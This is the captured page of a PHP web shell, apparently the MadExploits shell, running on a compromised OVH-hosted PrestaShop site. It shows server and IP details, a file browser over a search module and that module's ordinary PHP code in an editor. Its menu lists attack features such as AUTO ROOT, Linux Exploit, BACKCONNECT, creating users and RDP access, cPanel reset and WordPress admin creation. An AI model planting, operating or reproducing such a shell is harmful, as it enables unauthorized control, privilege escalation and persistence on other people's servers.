Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.104
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
newmed /
modules /
wbblocksearch /
[ HOME SHELL ]
Name
Size
Permission
Action
controllers
[ DIR ]
drwx---r-x
translations
[ DIR ]
drwx---r-x
views
[ DIR ]
drwx---r-x
CHANGELOG.txt
262
B
-rw----r--
Readme.md
1.69
KB
-rw----r--
config.xml
498
B
-rw----r--
config_fr.xml
498
B
-rw----r--
controller_ajax_search.php
2.32
KB
-rw----r--
index.php
1.24
KB
-rw----r--
logo.gif
2.53
KB
-rw----r--
logo.png
5.42
KB
-rw----r--
wbblocksearch.php
18.36
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : controller_ajax_search.php
<?php /** * 2007-2018 PrestaShop * * NOTICE OF LICENSE * * This source file is subject to the Academic Free License (AFL 3.0) * that is bundled with this package in the file LICENSE.txt. * It is also available through the world-wide-web at this URL: * http://opensource.org/licenses/afl-3.0.php * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@prestashop.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to http://www.prestashop.com for more information. * * @author PrestaShop SA <contact@prestashop.com> * @copyright 2007-2018 PrestaShop SA * @license http://opensource.org/licenses/afl-3.0.php Academic Free License (AFL 3.0) * International Registered Trademark & Property of PrestaShop SA */ require_once(dirname(__FILE__).'/../../config/config.inc.php'); require_once(dirname(__FILE__).'/../../init.php'); include_once(dirname(__FILE__).'/wbblocksearch.php'); if (empty($_REQUEST['queryString'])) { $search_string = ''; } else { $search_string = Tools::replaceAccentedChars($_REQUEST['queryString']); $id_cat = Tools::replaceAccentedChars($_REQUEST['id_Cat']); } $wblivesearch = new WbBlockSearch(); $searchResults = $wblivesearch->liveSearchProduct( $id_cat, Context::getContext()->language->id, $search_string ); if ($searchResults['total'] > 0) { Context::getContext()->smarty->assign( array( 'search_Total' => $searchResults['total'], 'searchResults' => $searchResults['result'], 'limit_item' => Configuration::get( 'NUM_ITEM_DISPLAY' ), 'query' => $search_string, 'link' => Context::getContext()->link ) ); } else { Context::getContext()->smarty->assign( array( 'search_Total' => 0, 'searchResults' => null, 'limit_item' => Configuration::get( 'NUM_ITEM_DISPLAY' ), 'query' => $search_string, 'link' => Context::getContext()->link ) ); } echo $wblivesearch->display(dirname(__FILE__).'/wbblocksearch.php', 'wb_search_result.tpl');
Close